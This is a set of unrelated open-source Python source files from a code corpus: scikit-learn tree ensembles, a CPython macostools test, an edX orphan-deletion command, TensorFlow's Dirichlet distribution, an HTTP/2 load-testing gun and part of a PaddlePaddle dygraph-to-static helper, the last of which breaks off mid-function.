of the dataset and use averaging to improve the predictive accuracy
and control over-fitting.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="mse")
The function to measure the quality of a split. The only supported
criterion is "mse" for the mean squared error.
Note: this parameter is tree-specific.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
Note: this parameter is tree-specific.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
Note: this parameter is tree-specific.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples in newly created leaves. A split is
discarded if after the split, one of the leaves would contain less then
``min_samples_leaf`` samples.
Note: this parameter is tree-specific.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
Note: this parameter is tree-specific.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
Note: this parameter is tree-specific.
bootstrap : boolean, optional (default=False)
Whether bootstrap samples are used when building trees.
Note: this parameter is tree-specific.
oob_score : bool
Whether to use out-of-bag samples to estimate
the generalization error.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
Attributes
----------
estimators_ : list of DecisionTreeRegressor
The collection of fitted sub-estimators.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features.
n_outputs_ : int
The number of outputs.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_prediction_ : array of shape = [n_samples]
Prediction computed with out-of-bag estimate on the training set.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
See also
--------
sklearn.tree.ExtraTreeRegressor: Base estimator for this ensemble.
RandomForestRegressor: Ensemble regressor using trees with optimal splits.
"""
    def __init__(self,
                 n_estimators=10,
                 criterion="mse",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False):
        """Build an extra-trees regressor with the given hyper-parameters.

        Ensemble-level options (``n_estimators``, ``bootstrap``,
        ``oob_score``, parallelism, verbosity, warm start) are passed to the
        base-class constructor; tree-level options are stored on ``self``.
        """
        # NOTE(review): the names listed in ``estimator_params`` appear to be
        # read back off ``self`` when each ExtraTreeRegressor sub-estimator is
        # built -- confirm against the BaseForest implementation.
        super(ExtraTreesRegressor, self).__init__(
            base_estimator=ExtraTreeRegressor(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "random_state"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start)
        # Tree-specific settings; matched by name with ``estimator_params``.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
class RandomTreesEmbedding(BaseForest):
    """An ensemble of totally random trees.
    An unsupervised transformation of a dataset to a high-dimensional
    sparse representation. A datapoint is coded according to which leaf of
    each tree it is sorted into. Using a one-hot encoding of the leaves,
    this leads to a binary coding with as many ones as there are trees in
    the forest.
    The dimensionality of the resulting representation is
    ``n_out <= n_estimators * max_leaf_nodes``. If ``max_leaf_nodes == None``,
    the number of leaf nodes is at most ``n_estimators * 2 ** max_depth``.
    Read more in the :ref:`User Guide <random_trees_embedding>`.
    Parameters
    ----------
    n_estimators : int
        Number of trees in the forest.
    max_depth : int
        The maximum depth of each tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
        Ignored if ``max_leaf_nodes`` is not None.
    min_samples_split : integer, optional (default=2)
        The minimum number of samples required to split an internal node.
    min_samples_leaf : integer, optional (default=1)
        The minimum number of samples in newly created leaves. A split is
        discarded if after the split, one of the leaves would contain less then
        ``min_samples_leaf`` samples.
    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the input samples required to be at a
        leaf node.
    max_leaf_nodes : int or None, optional (default=None)
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
        If not None then ``max_depth`` will be ignored.
    sparse_output : bool, optional (default=True)
        Whether or not to return a sparse CSR matrix, as default behavior,
        or to return a dense array compatible with dense pipeline operators.
    n_jobs : integer, optional (default=1)
        The number of jobs to run in parallel for both `fit` and `predict`.
        If -1, then the number of jobs is set to the number of cores.
    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.
    verbose : int, optional (default=0)
        Controls the verbosity of the tree building process.
    warm_start : bool, optional (default=False)
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest.
    Attributes
    ----------
    estimators_ : list of DecisionTreeClassifier
        The collection of fitted sub-estimators.
    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
           Machine Learning, 63(1), 3-42, 2006.
    .. [2] Moosmann, F. and Triggs, B. and Jurie, F.  "Fast discriminative
           visual codebooks using randomized clustering forests"
           NIPS 2007
    """

    def __init__(self,
                 n_estimators=10,
                 max_depth=5,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_leaf_nodes=None,
                 sparse_output=True,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False):
        """Build the embedding forest; see the class docstring for parameters."""
        # Bagging and OOB scoring are hard-disabled: the trees are fully
        # random and there is no target to score against.
        super(RandomTreesEmbedding, self).__init__(
            base_estimator=ExtraTreeRegressor(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "random_state"),
            bootstrap=False,
            oob_score=False,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start)
        # criterion and max_features are fixed (not user-configurable):
        # splits are random, so the impurity criterion is irrelevant and a
        # single candidate feature per split suffices.
        self.criterion = 'mse'
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = 1
        self.max_leaf_nodes = max_leaf_nodes
        self.sparse_output = sparse_output

    def _set_oob_score(self, X, y):
        # There is no meaningful out-of-bag score for an unsupervised
        # embedding; fail loudly instead of returning nonsense.
        raise NotImplementedError("OOB score not supported by tree embedding")

    def fit(self, X, y=None, sample_weight=None):
        """Fit estimator.
        Parameters
        ----------
        X : array-like or sparse matrix, shape=(n_samples, n_features)
            The input samples. Use ``dtype=np.float32`` for maximum
            efficiency. Sparse matrices are also supported, use sparse
            ``csc_matrix`` for maximum efficiency.
        Returns
        -------
        self : object
            Returns self.
        """
        # Delegates entirely to fit_transform; only the return value differs.
        self.fit_transform(X, y, sample_weight=sample_weight)
        return self

    def fit_transform(self, X, y=None, sample_weight=None):
        """Fit estimator and transform dataset.
        Parameters
        ----------
        X : array-like or sparse matrix, shape=(n_samples, n_features)
            Input data used to build forests. Use ``dtype=np.float32`` for
            maximum efficiency.
        Returns
        -------
        X_transformed : sparse matrix, shape=(n_samples, n_out)
            Transformed dataset.
        """
        # ensure_2d=False because there are actually unit test checking we fail
        # for 1d.
        X = check_array(X, accept_sparse=['csc'], ensure_2d=False)
        if issparse(X):
            # Pre-sort indices to avoid that each individual tree of the
            # ensemble sorts the indices.
            X.sort_indices()

        # The targets are pure random noise: they only exist to satisfy the
        # supervised tree-fitting machinery, the splits themselves are random.
        rnd = check_random_state(self.random_state)
        y = rnd.uniform(size=X.shape[0])
        super(RandomTreesEmbedding, self).fit(X, y,
                                              sample_weight=sample_weight)

        # One-hot encode the per-tree leaf indices returned by apply() to get
        # the final binary embedding.
        self.one_hot_encoder_ = OneHotEncoder(sparse=self.sparse_output)
        return self.one_hot_encoder_.fit_transform(self.apply(X))

    def transform(self, X):
        """Transform dataset.
        Parameters
        ----------
        X : array-like or sparse matrix, shape=(n_samples, n_features)
            Input data to be transformed. Use ``dtype=np.float32`` for maximum
            efficiency. Sparse matrices are also supported, use sparse
            ``csr_matrix`` for maximum efficiency.
        Returns
        -------
        X_transformed : sparse matrix, shape=(n_samples, n_out)
            Transformed dataset.
        """
        # Reuses the encoder fitted in fit_transform; requires a prior fit.
        return self.one_hot_encoder_.transform(self.apply(X))
| bsd-3-clause |
mancoast/CPythonPyc_test | cpython/244_test_macostools.py | 14 | 2371 | # Copyright (C) 2003 Python Software Foundation
import unittest
import macostools
import Carbon.File
import MacOS
import os
import sys
from test import test_support
TESTFN2 = test_support.TESTFN + '2'
class TestMacostools(unittest.TestCase):
    """Tests for ``macostools`` (classic Mac OS file utilities).

    ``setUp`` creates a scratch file with distinct data and resource forks;
    the tests then copy or alias it to ``TESTFN2`` and verify the result.
    """

    def setUp(self):
        # Data fork.
        fp = open(test_support.TESTFN, 'w')
        fp.write('hello world\n')
        fp.close()
        # Resource fork (MacOS.openrf opens a file's resource fork).
        rfp = MacOS.openrf(test_support.TESTFN, '*wb')
        rfp.write('goodbye world\n')
        rfp.close()

    def tearDown(self):
        self._unlink_quietly(test_support.TESTFN)
        self._unlink_quietly(TESTFN2)

    @staticmethod
    def _unlink_quietly(path):
        """Remove *path*, ignoring only OS-level failures.

        The original code used bare ``except:`` clauses in tearDown and in
        several tests, which would also mask genuine bugs (e.g. NameError).
        Only OSError (file missing, permissions) is expected here.
        """
        try:
            os.unlink(path)
        except OSError:
            pass

    def compareData(self):
        """Return '' if TESTFN and TESTFN2 match in both forks, else a
        short description of the first difference found."""
        fp = open(test_support.TESTFN, 'r')
        data1 = fp.read()
        fp.close()
        fp = open(TESTFN2, 'r')
        data2 = fp.read()
        fp.close()
        if data1 != data2:
            return 'Data forks differ'
        rfp = MacOS.openrf(test_support.TESTFN, '*rb')
        data1 = rfp.read(1000)
        rfp.close()
        rfp = MacOS.openrf(TESTFN2, '*rb')
        data2 = rfp.read(1000)
        rfp.close()
        if data1 != data2:
            return 'Resource forks differ'
        return ''

    def test_touched(self):
        # This really only tests that nothing unforeseen happens.
        macostools.touched(test_support.TESTFN)

    def test_copy(self):
        self._unlink_quietly(TESTFN2)
        macostools.copy(test_support.TESTFN, TESTFN2)
        self.assertEqual(self.compareData(), '')

    def test_mkalias(self):
        self._unlink_quietly(TESTFN2)
        macostools.mkalias(test_support.TESTFN, TESTFN2)
        fss, _, _ = Carbon.File.ResolveAliasFile(TESTFN2, 0)
        self.assertEqual(fss.as_pathname(), os.path.realpath(test_support.TESTFN))

    def test_mkalias_relative(self):
        # A relative alias anchors on sys.prefix; skip if it does not exist.
        if not os.path.exists(sys.prefix):
            return
        self._unlink_quietly(TESTFN2)
        macostools.mkalias(test_support.TESTFN, TESTFN2, sys.prefix)
        fss, _, _ = Carbon.File.ResolveAliasFile(TESTFN2, 0)
        self.assertEqual(fss.as_pathname(), os.path.realpath(test_support.TESTFN))
def test_main():
    # Entry point used by the regrtest framework: run the whole suite.
    test_support.run_unittest(TestMacostools)
if __name__ == '__main__':
    # Allow running this test file directly, outside of regrtest.
    test_main()
| gpl-3.0 |
edx/edx-platform | cms/djangoapps/contentstore/management/commands/delete_orphans.py | 5 | 1695 | """Script for deleting orphans"""
from django.core.management.base import BaseCommand, CommandError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from cms.djangoapps.contentstore.views.item import _delete_orphans
from xmodule.modulestore import ModuleStoreEnum
class Command(BaseCommand):
    """Management command that deletes orphaned blocks from a course.

    An orphan is a block no longer reachable from the course root; the
    actual discovery/deletion logic lives in ``_delete_orphans``.
    """
    help = '''
    Delete orphans from a MongoDB backed course. Takes two arguments:
    <course_id>: the course id of the course whose orphans you want to delete
    |--commit|: optional argument. If not provided, will dry run delete
    '''

    def add_arguments(self, parser):
        parser.add_argument('course_id')
        parser.add_argument('--commit', action='store_true', help='Commit to deleting the orphans')

    def handle(self, *args, **options):
        """Validate the course key, then run (or dry-run) orphan deletion."""
        try:
            course_key = CourseKey.from_string(options['course_id'])
        except InvalidKeyError:
            raise CommandError("Invalid course key.")  # lint-amnesty, pylint: disable=raise-missing-from

        commit = options['commit']
        # _delete_orphans itself honours the ``commit`` flag (it dry-runs when
        # False), so the call is identical in both modes -- only the messages
        # around it differ.  The previous version duplicated the call in each
        # branch.
        if commit:
            print('Deleting orphans from the course:')
        else:
            print('Dry run. The following orphans would have been deleted from the course:')
        deleted_items = _delete_orphans(
            course_key, ModuleStoreEnum.UserID.mgmt_command, commit
        )
        if commit:
            print("Success! Deleted the following orphans from the course:")
        print("\n".join(deleted_items))
| agpl-3.0 |
ryfeus/lambda-packs | Keras_tensorflow/source/tensorflow/contrib/distributions/python/ops/dirichlet.py | 11 | 9377 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Dirichlet distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
# Shared docstring addendum, appended to the probability methods below via
# distribution_util.AppendDocstring.
_dirichlet_prob_note = """
Note that the input must be a non-negative tensor with dtype `dtype` and whose
shape can be broadcast with `self.alpha`. For fixed leading dimensions, the
last dimension represents counts for the corresponding Dirichlet distribution
in `self.alpha`. `x` is only legal if it sums up to one.
"""
class Dirichlet(distribution.Distribution):
  """Dirichlet distribution.
  This distribution is parameterized by a vector `alpha` of concentration
  parameters for `k` classes.
  #### Mathematical details
  The Dirichlet is a distribution over the standard n-simplex, where the
  standard n-simplex is defined by:
  ```{ (x_1, ..., x_n) in R^(n+1) | sum_j x_j = 1 and x_j >= 0 for all j }```.
  The distribution has hyperparameters `alpha = (alpha_1,...,alpha_k)`,
  and probability mass function (prob):
  ```prob(x) = 1 / Beta(alpha) * prod_j x_j^(alpha_j - 1)```
  where `Beta(x) = prod_j Gamma(x_j) / Gamma(sum_j x_j)` is the multivariate
  beta function.
  This class provides methods to create indexed batches of Dirichlet
  distributions. If the provided `alpha` is rank 2 or higher, for
  every fixed set of leading dimensions, the last dimension represents one
  single Dirichlet distribution. When calling distribution
  functions (e.g. `dist.prob(x)`), `alpha` and `x` are broadcast to the
  same shape (if possible). In all cases, the last dimension of alpha/x
  represents single Dirichlet distributions.
  #### Examples
  ```python
  alpha = [1, 2, 3]
  dist = Dirichlet(alpha)
  ```
  Creates a 3-class distribution, with the 3rd class is most likely to be drawn.
  The distribution functions can be evaluated on x.
  ```python
  # x same shape as alpha.
  x = [.2, .3, .5]
  dist.prob(x)  # Shape []
  # alpha will be broadcast to [[1, 2, 3], [1, 2, 3]] to match x.
  x = [[.1, .4, .5], [.2, .3, .5]]
  dist.prob(x)  # Shape [2]
  # alpha will be broadcast to shape [5, 7, 3] to match x.
  x = [[...]]  # Shape [5, 7, 3]
  dist.prob(x)  # Shape [5, 7]
  ```
  Creates a 2-batch of 3-class distributions.
  ```python
  alpha = [[1, 2, 3], [4, 5, 6]]  # Shape [2, 3]
  dist = Dirichlet(alpha)
  # x will be broadcast to [[2, 1, 0], [2, 1, 0]] to match alpha.
  x = [.2, .3, .5]
  dist.prob(x)  # Shape [2]
  ```
  """

  def __init__(self,
               alpha,
               validate_args=False,
               allow_nan_stats=True,
               name="Dirichlet"):
    """Initialize a batch of Dirichlet distributions.
    Args:
      alpha: Positive floating point tensor with shape broadcastable to
        `[N1,..., Nm, k]` `m >= 0`. Defines this as a batch of `N1 x ... x Nm`
        different `k` class Dirichlet distributions.
      validate_args: `Boolean`, default `False`. Whether to assert valid values
        for parameters `alpha` and `x` in `prob` and `log_prob`. If `False`,
        correct behavior is not guaranteed.
      allow_nan_stats: `Boolean`, default `True`. If `False`, raise an
        exception if a statistic (e.g. mean/mode/etc...) is undefined for any
        batch member. If `True`, batch members with valid parameters leading to
        undefined statistics will return NaN for this statistic.
      name: The name to prefix Ops created by this distribution class.
    Examples:
    ```python
    # Define 1-batch of 2-class Dirichlet distributions,
    # also known as a Beta distribution.
    dist = Dirichlet([1.1, 2.0])
    # Define a 2-batch of 3-class distributions.
    dist = Dirichlet([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
    ```
    """
    parameters = locals()
    parameters.pop("self")
    with ops.name_scope(name, values=[alpha]) as ns:
      alpha = ops.convert_to_tensor(alpha, name="alpha")
      # The positivity/rank asserts only enter the graph when
      # validate_args=True; otherwise the dependency list is empty and the
      # identity op is effectively free.
      with ops.control_dependencies([
          check_ops.assert_positive(alpha),
          check_ops.assert_rank_at_least(alpha, 1)
      ] if validate_args else []):
        self._alpha = array_ops.identity(alpha, name="alpha")
        # Cache the total concentration alpha_0 = sum_j alpha_j; reused by
        # mean/variance/entropy/mode below.
        self._alpha_sum = math_ops.reduce_sum(alpha,
                                              reduction_indices=[-1],
                                              keep_dims=False)
    super(Dirichlet, self).__init__(
        dtype=self._alpha.dtype,
        validate_args=validate_args,
        allow_nan_stats=allow_nan_stats,
        is_continuous=True,
        is_reparameterized=False,
        parameters=parameters,
        graph_parents=[self._alpha, self._alpha_sum],
        name=ns)

  @property
  def alpha(self):
    """Shape parameter."""
    return self._alpha

  @property
  def alpha_sum(self):
    """Sum of shape parameter."""
    return self._alpha_sum

  def _batch_shape(self):
    # Batch shape is alpha's shape minus its last (event) dimension, which
    # is exactly the shape of the cached alpha_sum.
    return array_ops.shape(self.alpha_sum)

  def _get_batch_shape(self):
    return self.alpha_sum.get_shape()

  def _event_shape(self):
    # The event dimension is the last axis of alpha: the number of classes k.
    return array_ops.gather(array_ops.shape(self.alpha),
                            [array_ops.rank(self.alpha) - 1])

  def _get_event_shape(self):
    return self.alpha.get_shape().with_rank_at_least(1)[-1:]

  def _sample_n(self, n, seed=None):
    # Standard construction: draw independent Gamma(alpha_j) variates and
    # normalize along the event axis so each sample sums to one.
    gamma_sample = random_ops.random_gamma(
        [n,], self.alpha, dtype=self.dtype, seed=seed)
    return gamma_sample / math_ops.reduce_sum(
        gamma_sample, reduction_indices=[-1], keep_dims=True)

  @distribution_util.AppendDocstring(_dirichlet_prob_note)
  def _log_prob(self, x):
    x = ops.convert_to_tensor(x, name="x")
    x = self._assert_valid_sample(x)
    # log p(x) = sum_j (alpha_j - 1) * log(x_j) - log Beta(alpha)
    unnorm_prob = (self.alpha - 1.) * math_ops.log(x)
    log_prob = math_ops.reduce_sum(
        unnorm_prob, reduction_indices=[-1],
        keep_dims=False) - special_math_ops.lbeta(self.alpha)
    return log_prob

  @distribution_util.AppendDocstring(_dirichlet_prob_note)
  def _prob(self, x):
    return math_ops.exp(self._log_prob(x))

  def _entropy(self):
    # H = log Beta(alpha) + (alpha_0 - k) * digamma(alpha_0)
    #     - sum_j (alpha_j - 1) * digamma(alpha_j),  alpha_0 = sum_j alpha_j.
    entropy = special_math_ops.lbeta(self.alpha)
    entropy += math_ops.digamma(self.alpha_sum) * (
        self.alpha_sum - math_ops.cast(self.event_shape()[0], self.dtype))
    entropy += -math_ops.reduce_sum(
        (self.alpha - 1.) * math_ops.digamma(self.alpha),
        reduction_indices=[-1],
        keep_dims=False)
    return entropy

  def _mean(self):
    # E[X_j] = alpha_j / alpha_0.
    return self.alpha / array_ops.expand_dims(self.alpha_sum, -1)

  def _variance(self):
    # Covariance of a Dirichlet: with a = alpha / alpha_0,
    #   Cov = (diag(a) - outer(a, a)) / (1 + alpha_0).
    # scale = alpha_0 * sqrt(1 + alpha_0) folds the 1/(1 + alpha_0) factor
    # into the normalized alpha used below.
    scale = self.alpha_sum * math_ops.sqrt(1. + self.alpha_sum)
    alpha = self.alpha / scale
    outer_prod = -math_ops.matmul(
        array_ops.expand_dims(
            alpha, dim=-1),  # column
        array_ops.expand_dims(
            alpha, dim=-2))  # row
    # Overwrite the diagonal with the variances a_j (1 - a_j) / (1 + alpha_0).
    return array_ops.matrix_set_diag(outer_prod,
                                     alpha * (self.alpha_sum / scale - alpha))

  def _std(self):
    return math_ops.sqrt(self._variance())

  @distribution_util.AppendDocstring(
      """Note that the mode for the Dirichlet distribution is only defined
      when `alpha > 1`. This returns the mode when `alpha > 1`,
      and NaN otherwise. If `self.allow_nan_stats` is `False`, an exception
      will be raised rather than returning `NaN`.""")
  def _mode(self):
    # mode_j = (alpha_j - 1) / (alpha_0 - k); undefined for alpha_j <= 1.
    mode = ((self.alpha - 1.) /
            (array_ops.expand_dims(self.alpha_sum, dim=-1) -
             math_ops.cast(self.event_shape()[0], self.dtype)))
    if self.allow_nan_stats:
      # Replace undefined entries (alpha_j <= 1) with NaN.
      nan = np.array(np.nan, dtype=self.dtype.as_numpy_dtype())
      shape = array_ops.concat((self.batch_shape(), self.event_shape()), 0)
      return array_ops.where(
          math_ops.greater(self.alpha, 1.),
          mode,
          array_ops.fill(shape, nan, name="nan"))
    else:
      # Fail at graph-execution time if any component makes the mode
      # undefined.
      return control_flow_ops.with_dependencies([
          check_ops.assert_less(
              array_ops.ones((), dtype=self.dtype), self.alpha,
              message="mode not defined for components of alpha <= 1")
      ], mode)

  def _assert_valid_sample(self, x):
    # A valid sample lies on the open simplex: strictly positive entries
    # that sum (approximately) to one along the event dimension.  The checks
    # are graph asserts and are skipped unless validate_args=True.
    if not self.validate_args: return x
    return control_flow_ops.with_dependencies([
        check_ops.assert_positive(x),
        distribution_util.assert_close(
            array_ops.ones((), dtype=self.dtype),
            math_ops.reduce_sum(x, reduction_indices=[-1])),
    ], x)
| mit |
direvius/bfg | bfg/guns/http2.py | 1 | 2875 | '''
Guns for HTTP/2
'''
import logging
from collections import namedtuple
from hyper import HTTP20Connection, tls
import ssl
from hyper.http20.exceptions import ConnectionError
from .base import GunBase
# Shape of a single HTTP/2 request; appears unused within this module but is
# kept as part of its importable surface.
Http2Ammo = namedtuple("Http2Ammo", "method,uri,headers,body")

logger = logging.getLogger(__name__)
class HttpMultiGun(GunBase):
    '''
    Multi request gun. Only GET. Expects an array of (marker, request)
    tuples in task.data. A stream is opened for every request first and
    responses are readed after all streams have been opened. A sample is
    measured for every action and for overall time for a whole batch.
    The sample for overall time is marked with 'overall' in action field.
    '''
    SECTION = 'http_gun'

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base_address = self.get_option('target')
        logger.info("Initialized http2 gun with target '%s'", self.base_address)
        # Certificate verification is disabled on purpose: this is a load
        # generator and targets are often test stands with self-signed certs.
        context = tls.init_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        # A single multiplexed HTTP/2 connection is shared by every shot.
        self.conn = HTTP20Connection(self.base_address, secure=True, ssl_context=context)

    def shoot(self, task):
        """Fire one batch: open one stream per sub-request, then read all
        responses; record a timing sample per action plus one 'overall'."""
        logger.debug("Task: %s", task)
        scenario = task.marker
        # Each (marker, uri) pair in task.data becomes its own sub-task so
        # it gets an individual measured sample.
        subtasks = [
            task._replace(data=missile[1], marker=missile[0])
            for missile in task.data
        ]
        streams = []
        with self.measure(task) as overall_sw:
            # Phase 1: open all streams back to back, timing each request.
            for subtask in subtasks:
                with self.measure(subtask) as sw:
                    logger.debug("Request GET %s", subtask.data)
                    streams.append(
                        (subtask, self.conn.request('GET', subtask.data)))
                    sw.stop()
                    sw.scenario = scenario
                    sw.action = "request"
            # Phase 2: read the responses in the order the streams opened.
            for (subtask, stream) in streams:
                with self.measure(subtask) as sw:
                    logger.debug("Response for %s from %s ", subtask.data, stream)
                    try:
                        resp = self.conn.get_response(stream)
                    except (ConnectionError, KeyError) as e:
                        # Per-response errors are recorded on both the
                        # individual sample and the batch-level sample.
                        sw.stop()
                        # TODO: try to add a meaningful code here
                        sw.set_error(1)
                        overall_sw.set_error(1)
                        sw.ext["error"] = str(e)
                        overall_sw.ext.setdefault('error', []).append(str(e))
                        logger.warning("Error getting response: %s", str(e))
                    else:
                        sw.stop()
                        sw.set_code(str(resp.status))
                        sw.scenario = scenario
                        sw.action = "response"
            # The batch sample covers both phases.
            overall_sw.stop()
            overall_sw.scenario = scenario
            overall_sw.action = "overall"
| mit |
PaddlePaddle/Paddle | python/paddle/fluid/dygraph/dygraph_to_static/variable_trans_func.py | 1 | 4696 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import six
import gast
from paddle.fluid import core
from paddle.fluid import unique_name
from paddle.fluid.framework import Variable
from paddle.fluid.layers import fill_constant
from paddle.fluid.layer_helper import LayerHelper
# Explicit public surface of this dygraph-to-static helper module.
__all__ = [
    'create_bool_as_type', 'create_fill_constant_node',
    'create_static_variable_gast_node', 'data_layer_not_check',
    'to_static_variable', 'to_static_variable_gast_node'
]
def data_layer_not_check(name, shape, dtype='float32', lod_level=0):
    """
    This function creates a Tensor on the global block. The created Tensor
    doesn't check the dtype and the shape of feed data because dygraph input
    data can be various-length. This API is used in translating dygraph into
    static graph.
    Note:
        The default :code:`stop_gradient` attribute of the Tensor created by
        this API is true, which means the gradient won't be passed backward
        through the data Tensor. Set :code:`var.stop_gradient = False` If
        user would like to pass backward gradient.
    Args:
        name (str): The name/alias of the Tensor, see :ref:`api_guide_Name`
            for more details.
        shape (list|tuple): List|Tuple of integers declaring the shape. You can
            set "None" at a dimension to indicate the dimension can be of any
            size. For example, it is useful to set changeable batch size as "None"
        dtype (np.dtype|VarType|str, optional): The type of the data. Supported
            dtype: bool, float16, float32, float64, int8, int16, int32, int64,
            uint8. Default: float32
        lod_level (int, optional): The LoD level of the LoDTensor. Usually users
            don't have to set this value. For more details about when and how to
            use LoD level, see :ref:`user_guide_lod_tensor` . Default: 0
    Returns:
        Tensor: The global Tensor that gives access to the data.
    """
    helper = LayerHelper('data', **locals())
    # Unknown (None) dimensions are encoded as -1, the static-graph marker
    # for "any size".  A comprehension replaces the former index loop and
    # also subsumes the explicit list(shape) copy.
    shape = [-1 if dim is None else dim for dim in shape]
    return helper.create_global_variable(
        name=name,
        shape=shape,
        dtype=dtype,
        type=core.VarDesc.VarType.LOD_TENSOR,
        stop_gradient=True,
        lod_level=lod_level,
        is_data=True,
        # The whole point of this helper: skip feed-time shape/dtype checks
        # so variable-length dygraph input can be fed.
        need_check_feed=False)
def to_static_variable_gast_node(name):
    """Return an AST statement that rebinds *name* through to_static_variable."""
    assign_code = "{0} = paddle.jit.dy2static.to_static_variable({0})".format(
        name)
    return gast.parse(assign_code).body[0]
def create_static_variable_gast_node(name):
    # Emits e.g. ``x = paddle.jit.dy2static .data_layer_not_check(...)`` with
    # a uniquified variable name.  Note: the trailing backslash continues the
    # *string literal*, so the generated code keeps the next line's leading
    # spaces before the attribute dot (harmless -- whitespace around '.' is
    # legal Python).
    func_code = "{} = paddle.jit.dy2static\
        .data_layer_not_check(name='{}', shape=[-1], dtype='float32')".format(
        name, unique_name.generate(name))
    return gast.parse(func_code).body[0]
def create_fill_constant_node(name, value):
    """Return an AST statement assigning a fill_constant of *value* to *name*.

    Returns None for unsupported value types (same as the implicit
    fall-through in the previous version).
    """
    # bool is tested first because bool is a subclass of int in Python.
    if isinstance(value, bool):
        dtype = 'bool'
    elif isinstance(value, float):
        dtype = 'float64'
